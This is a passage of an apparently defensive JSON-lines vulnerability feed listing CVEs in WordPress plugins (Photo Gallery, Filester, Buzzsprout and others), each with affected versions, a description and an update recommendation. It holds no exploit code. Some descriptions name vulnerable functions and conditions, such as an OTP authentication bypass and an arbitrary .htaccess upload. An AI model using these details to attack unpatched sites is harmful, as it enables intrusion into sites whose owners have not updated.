version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31c080b8-ba00-4e96-8961-2a1c3a017004?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31c080b8-ba00-4e96-8961-2a1c3a017004?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpforms.com\\\/docs\\\/how-to-view-recent-changes-to-the-wpforms-plugin-changelog\\\/#1-8-5-4-2023-12-27\",\"name\":\"https:\\\/\\\/wpforms.com\\\/docs\\\/how-to-view-recent-changes-to-the-wpforms-plugin-changelog\\\/#1-8-5-4-2023-12-27\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5335","slug":"buzzsprout-podcasting","versionImpact":"1.8.4","versionEndExcluding":"1.8.5","description":"The Buzzsprout Podcasting plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'buzzsprout' shortcode in versions up to, and including, 1.8.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buzzsprout-podcasting\\\/tags\\\/1.8.3\\\/buzzsprout-podcasting.php#L271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buzzsprout-podcasting\\\/tags\\\/1.8.3\\\/buzzsprout-podcasting.php#L271\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be7f8b73-801d-46e8-81c1-8bb0bb576700?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be7f8b73-801d-46e8-81c1-8bb0bb576700?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23716","slug":"zendesk","versionImpact":"1.8.4","versionEndExcluding":"1.8.5","description":"Missing Authorization vulnerability in Zendesk Zendesk Support for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Zendesk Support for WordPress: from n\/a through 1.8.4.","recommendation":"Update to version 1.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zendesk\\\/vulnerability\\\/wordpress-zendesk-support-for-wordpress-plugin-1-8-4-cross-site-request-forgery-csrf?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zendesk\\\/vulnerability\\\/wordpress-zendesk-support-for-wordpress-plugin-1-8-4-cross-site-request-forgery-csrf?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0376","slug":"qubely","versionImpact":"1.8.4","versionEndExcluding":"1.8.5","description":"The Qubely WordPress plugin before 1.8.5 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 1.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1aa6f32-c1d5-4fc6-9a4e-d4c5fae78389\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b1aa6f32-c1d5-4fc6-9a4e-d4c5fae78389\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8066","slug":"filester","versionImpact":"1.8.4","versionEndExcluding":"1.8.5","description":"The File Manager Pro \u2013 Filester plugin for WordPress is vulnerable to arbitrary file uploads due to missing validation in the 'fsConnector' function in all versions up to, and including, 1.8.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an Administrator, to upload a new .htaccess file allowing them to subsequently upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.8.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L269\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L269\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186518\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186518\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27288836-e5d3-49fc-b1f6-319ea3b70839?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/27288836-e5d3-49fc-b1f6-319ea3b70839?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8342","slug":"login-with-phone-number","versionImpact":"1.8.47","versionEndExcluding":"1.8.48","description":"The WooCommerce OTP Login With Phone Number, OTP Verification plugin for WordPress is vulnerable to authentication bypass due to insufficient empty value checking in the lwp_ajax_register function in all versions up to, and including, 1.8.47. This makes it possible for unauthenticated attackers to bypass OTP verification and gain administrative access to any user account with a configured phone number by exploiting improper Firebase API error handling when the Firebase API key is not configured.","recommendation":"Update to version 1.8.48, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.8.47\\\/login-with-phonenumber.php#L4358\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.8.47\\\/login-with-phonenumber.php#L4358\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.8.47\\\/login-with-phonenumber.php#L4373\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/login-with-phone-number\\\/tags\\\/1.8.47\\\/login-with-phonenumber.php#L4373\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338150%40login-with-phone-number&new=3338150%40login-with-phone-number&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338150%40login-with-phone-number&new=3338150%40login-with-phone-number&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e74582f-8e94-4cba-a3eb-0a823a5235ad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e74582f-8e94-4cba-a3eb-0a823a5235ad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-38690","slug":"ipanorama-360-virtual-tour-builder-lite","versionImpact":"1.8.3","versionEndExcluding":"1.8.4","description":"Missing Authorization vulnerability in Avirtum iPanorama 360 WordPress Virtual Tour Builder allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects iPanorama 360 WordPress Virtual Tour Builder: from n\/a through 1.8.3.","recommendation":"Update to version 1.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipanorama-360-virtual-tour-builder-lite\\\/wordpress-ipanorama-360-plugin-1-8-3-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipanorama-360-virtual-tour-builder-lite\\\/wordpress-ipanorama-360-plugin-1-8-3-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2127","slug":"pagelayer","versionImpact":"1.8.3","versionEndExcluding":"1.8.4","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom attributes in all versions up to, and including, 1.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98bff131-dee2-4549-9167-69dc3f8d6b9d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98bff131-dee2-4549-9167-69dc3f8d6b9d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045444%40pagelayer&new=3045444%40pagelayer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3045444%40pagelayer&new=3045444%40pagelayer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4419","slug":"fetch-jft","versionImpact":"1.8.3","versionEndExcluding":"1.8.4","description":"The Fetch JFT plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.8.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.8.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5aca31f5-310f-441b-8d8c-51b7bf2b0b7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5aca31f5-310f-441b-8d8c-51b7bf2b0b7d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089669%40fetch-jft%2Ftrunk&old=3025839%40fetch-jft%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089669%40fetch-jft%2Ftrunk&old=3025839%40fetch-jft%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2269","slug":"photo-gallery","versionImpact":"1.8.34","versionEndExcluding":"1.8.35","description":"The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018image_id\u2019 parameter in all versions up to, and including, 1.8.34 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.","recommendation":"Update to version 1.8.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.34\\\/admin\\\/views\\\/Editimage.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-gallery\\\/tags\\\/1.8.34\\\/admin\\\/views\\\/Editimage.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce261415-870c-4300-85e8-b15a02c7eec5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce261415-870c-4300-85e8-b15a02c7eec5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0613","slug":"photo-gallery","versionImpact":"1.8.33","versionEndExcluding":"1.8.34","description":"The Photo Gallery by 10Web  WordPress plugin before 1.8.34 does not sanitised and escaped comment added on images by unauthenticated users, leading to an Unauthenticated Stored-XSS attack when comments are displayed","recommendation":"Update to version 1.8.34, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/22be2b44-cd42-4b02-8448-59dd2989dde1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/22be2b44-cd42-4b02-8448-59dd2989dde1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13124","slug":"photo-gallery","versionImpact":"1.8.32","versionEndExcluding":"1.8.33","description":"The Photo Gallery by 10Web  WordPress plugin before 1.8.33 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.8.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b3bf87b-73a1-47e8-bb00-0dfded07b191\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5b3bf87b-73a1-47e8-bb00-0dfded07b191\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9878","slug":"photo-gallery","versionImpact":"1.8.30","versionEndExcluding":"1.8.31","description":"The Photo Gallery by 10Web \u2013 Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.8.30 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.8.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfa1192b-34f5-4b71-8fff-14f2d4ac4aca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfa1192b-34f5-4b71-8fff-14f2d4ac4aca?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179357\\\/WordPress-Photo-Gallery-1.8.26-Cross-Site-Scripting.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/179357\\\/WordPress-Photo-Gallery-1.8.26-Cross-Site-Scripting.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3180567%40photo-gallery%2Ftrunk&old=3171538%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3180567%40photo-gallery%2Ftrunk&old=3171538%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=#file12\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10704","slug":"photo-gallery","versionImpact":"1.8.30","versionEndExcluding":"1.8.31","description":"The Photo Gallery by 10Web  WordPress plugin before 1.8.31 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.8.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c115117-11c0-4c9e-9988-8547c9364c01\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6c115117-11c0-4c9e-9988-8547c9364c01\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10876","slug":"charitable","versionImpact":"1.8.3","versionEndExcluding":"1.8.3.1","description":"The Charitable \u2013 Donation Plugin for WordPress \u2013 Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.8.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.8.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68014bb5-b2ef-4e2f-9c47-85e555ded5a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68014bb5-b2ef-4e2f-9c47-85e555ded5a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.2\\\/includes\\\/admin\\\/donations\\\/class-charitable-donation-list-table.php#L318\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.2\\\/includes\\\/admin\\\/donations\\\/class-charitable-donation-list-table.php#L318\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183944\\\/charitable\\\/trunk\\\/includes\\\/admin\\\/donations\\\/class-charitable-donation-list-table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3183944\\\/charitable\\\/trunk\\\/includes\\\/admin\\\/donations\\\/class-charitable-donation-list-table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4475","slug":"jquery-collapse-o-matic","versionEndExcluding":"1.8.3","description":"The Collapse-O-Matic WordPress plugin before 1.8.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b5c377c-3148-4373-996c-89851d5e39e5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b5c377c-3148-4373-996c-89851d5e39e5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7031","slug":"filester","versionImpact":"1.8.2","versionEndExcluding":"1.8.3","description":"The File Manager Pro \u2013 Filester plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'njt_fs_saveSettingRestrictions' function in all versions up to, and including, 1.8.2. This makes it possible for authenticated attackers, with a role that has been granted permissions by an Administrator, to update the plugin settings for user role restrictions, including allowing file types such as .php to be uploaded.","recommendation":"Update to version 1.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aef584bd-60a5-4bf2-b8d3-58e3b45e785e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aef584bd-60a5-4bf2-b8d3-58e3b45e785e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L566\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/filester\\\/trunk\\\/includes\\\/File_manager\\\/FileManager.php#L566\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129722\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129722\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1452","slug":"generateblocks","versionImpact":"1.8.2","versionEndExcluding":"1.8.3","description":"The GenerateBlocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.2 via Query Loop. This makes it possible for authenticated attackers, with contributor access and above, to see contents of posts and pages in draft or private status as well as those with scheduled publication dates.","recommendation":"Update to version 1.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62f19301-2311-4989-a5f2-9f845b72dd54?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62f19301-2311-4989-a5f2-9f845b72dd54?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-query-loop.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-query-loop.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-query-loop.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/generateblocks\\\/trunk\\\/includes\\\/class-query-loop.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041431%40generateblocks%2Ftrunk&old=2995923%40generateblocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041431%40generateblocks%2Ftrunk&old=2995923%40generateblocks%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1039","slug":"lenix-elementor-leads-addon","versionImpact":"1.8.2","versionEndExcluding":"1.8.3","description":"The Lenix Elementor Leads addon plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a URL form field in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237538\\\/lenix-elementor-leads-addon\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3237538\\\/lenix-elementor-leads-addon\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d1abaf9-4044-4dcc-95df-73f23a8a5a9f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d1abaf9-4044-4dcc-95df-73f23a8a5a9f\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29f835c8-769a-47c0-832f-622860b1c59c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29f835c8-769a-47c0-832f-622860b1c59c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9647","slug":"kama-spamblock","versionImpact":"1.8.2","versionEndExcluding":"1.8.3","description":"The Kama SpamBlock plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_POST values in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f2d3acb-5931-4629-8f03-4ab40fadf7c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f2d3acb-5931-4629-8f03-4ab40fadf7c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kama-spamblock\\\/tags\\\/1.8.2\\\/Kama_Spamblock.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kama-spamblock\\\/tags\\\/1.8.2\\\/Kama_Spamblock.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167874\\\/kama-spamblock\\\/tags\\\/1.8.3\\\/Kama_Spamblock.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167874\\\/kama-spamblock\\\/tags\\\/1.8.3\\\/Kama_Spamblock.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36744","slug":"notificationx","versionEndExcluding":"1.8.3","description":"The NotificationX plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8.2. This is due to missing or incorrect nonce validation on the generate_conversions() function. This makes it possible for unauthenticated attackers to generate conversions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ebe7680-a76d-4178-a729-f0d79d861912?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ebe7680-a76d-4178-a729-f0d79d861912?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368331\\\/notificationx\\\/trunk\\\/public\\\/class-nx-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2368331\\\/notificationx\\\/trunk\\\/public\\\/class-nx-public.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8670","slug":"photo-gallery","versionImpact":"1.8.28","versionEndExcluding":"1.8.29","description":"The Photo Gallery by 10Web  WordPress plugin before 1.8.29 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.8.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50665594-778b-42f5-bfba-2a249a5e0260\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/50665594-778b-42f5-bfba-2a249a5e0260\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
